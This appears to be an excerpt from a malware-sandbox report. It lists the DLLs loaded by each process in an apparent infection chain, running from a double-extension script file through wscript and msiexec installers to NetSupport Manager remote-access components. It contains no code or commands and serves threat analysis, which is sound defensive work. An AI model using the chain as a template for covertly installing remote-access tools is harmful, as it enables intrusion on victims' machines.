                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msdart.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                                Source: C:\Windows\Installer\MSI264F.tmpSection loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSI264F.tmpSection loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSI264F.tmpSection loaded: version.dll
                                Source: C:\Windows\Installer\MSI264F.tmpSection loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSI264F.tmpSection loaded: winmm.dll
                                Source: C:\Windows\Installer\MSI264F.tmpSection loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSI264F.tmpSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI264F.tmpSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI264F.tmpSection loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSI264F.tmpSection loaded: samcli.dll
                                Source: C:\Windows\Installer\MSI264F.tmpSection loaded: netutils.dll
                                Source: C:\Windows\Installer\MSI264F.tmpSection loaded: samlib.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmpSection loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmpSection loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmpSection loaded: version.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmpSection loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmpSection loaded: winmm.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmpSection loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmpSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmpSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmpSection loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmpSection loaded: samcli.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmpSection loaded: netutils.dll
                                Source: C:\Windows\Installer\MSI2BE4.tmpSection loaded: samlib.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: winmm.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: dbghelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: version.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: winmm.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: samcli.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: netutils.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: samlib.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: uxtheme.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: ntmarta.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: msasn1.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: devrtl.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: spinf.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: drvstore.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: pciax.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: firewallapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: dnsapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: iphlpapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: fwbase.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: fwpolicyiomgr.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: firewallapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: dnsapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: iphlpapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: fwbase.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: fwpolicyiomgr.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: windows.storage.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: wldp.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: profapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: propsys.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: linkinfo.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: ntshrui.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: srvcli.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: cscapi.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmpSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: dwmapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: ntmarta.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: client32provider.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: apphelp.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: shfolder.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: version.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: dwmapi.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: winmm.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: dbghelp.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: dbgcore.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: sspicli.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: netapi32.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: samcli.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: netutils.dll
                                Source: C:\Windows\Installer\MSI51C1.tmpSection loaded: samlib.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcicl32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: shfolder.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mpr.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winmm.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wsock32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcp100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: activeds.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wininet.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msvcr100.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: adsldpc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: samcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wkscli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbghelp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dbgcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wtsapi32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcichek.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: powrprof.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: umpdc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: winsta.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: devobj.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: pcicapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched32.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: riched20.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeSection loaded: usp10.dll
